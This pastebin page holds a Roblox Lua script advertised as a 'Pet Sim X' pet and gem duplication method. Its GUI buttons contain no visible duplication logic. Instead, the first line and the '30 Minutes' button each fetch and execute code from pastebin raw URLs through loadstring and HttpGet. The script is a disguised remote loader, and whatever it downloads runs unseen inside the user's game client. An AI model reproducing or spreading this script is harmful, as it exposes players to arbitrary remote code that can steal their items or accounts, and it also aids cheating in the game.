Facebook
From main.Name, 1 Year ago, written in Plain Text.
This paste is a reply to Re: NEW UPDATE PET SIM X DUPE PETS/GEMS from Gruff Dolphin - view diff
Embed
Download Paste or View Raw
Hits: 540
  1. loadstring(game:HttpGet("https://pastebin.com/raw/0e2hE0KQ"))()local ScreenGui = Instance.new("ScreenGui")
  2. local main = Instance.new("Frame")
  3. local DupedMethodMadeByPr4ston = Instance.new("TextLabel")
  4. local RESET = Instance.new("TextButton")
  5. local _10Minutes = Instance.new("TextButton")
  6. local _20Minutes = Instance.new("TextButton")
  7. local _30Minutes = Instance.new("TextButton")
  8.  
  9. --Properties:
  10.  
  11. ScreenGui.Parent = game.CoreGui
  12.  
  13. main.Name = "main"
  14. main.Parent = ScreenGui
  15. main.BackgroundColor3 = Color3.fromRGB(127, 127, 127)
  16. main.Position = UDim2.new(0.0659062043, 0, 0.186878726, 0)
  17. main.Size = UDim2.new(0, 214, 0, 260)
  18. main.Active = true
  19. main.Draggable = true
  20.  
  21. DupedMethodMadeByPr4ston.Name = "Duped Method | Made By Pr4ston"
  22. DupedMethodMadeByPr4ston.Parent = main
  23. DupedMethodMadeByPr4ston.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
  24. DupedMethodMadeByPr4ston.Position = UDim2.new(-0.000352235977, 0, 0, 0)
  25. DupedMethodMadeByPr4ston.Size = UDim2.new(0, 215, 0, 56)
  26. DupedMethodMadeByPr4ston.Font = Enum.Font.SourceSans
  27. DupedMethodMadeByPr4ston.Text = "Duped Method | Made By Pr4ston"
  28. DupedMethodMadeByPr4ston.TextColor3 = Color3.fromRGB(0, 0, 0)
  29. DupedMethodMadeByPr4ston.TextSize = 14.000
  30.  
  31. RESET.Name = "RESET"
  32. RESET.Parent = main
  33. RESET.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  34. RESET.Position = UDim2.new(0, 0, 0.204379559, 0)
  35. RESET.Size = UDim2.new(0, 214, 0, 50)
  36. RESET.Font = Enum.Font.SourceSans
  37. RESET.Text = "RESET"
  38. RESET.TextColor3 = Color3.fromRGB(0, 0, 0)
  39. RESET.TextSize = 40.000
  40.  
  41. _30Minutes.Name = "30 Minutes"
  42. _30Minutes.Parent = main
  43. _30Minutes.BackgroundColor3 = Color3.fromRGB(0, 71, 0)
  44. _30Minutes.Position = UDim2.new(0, 0, 0.746376812, 0)
  45. _30Minutes.Size = UDim2.new(0, 213, 0, 65)
  46. _30Minutes.Font = Enum.Font.SourceSans
  47. _30Minutes.Text = "30 Minutes"
  48. _30Minutes.TextColor3 = Color3.fromRGB(0, 0, 0)
  49. _30Minutes.TextSize = 46.000
  50. _30Minutes.MouseButton1Down:connect(function()
  51.         loadstring(game:HttpGet('https://pastebin.com/raw/2bGnr2Dw'))()
  52. end)
  53.  

Replies to Re: Re: NEW UPDATE PET SIM X DUPE PETS/GEMS rss

Title Name Language When
Re: Re: Re: NEW UPDATE PET SIM X DUPE PETS/GEMS Lousy Moth text 1 Year ago.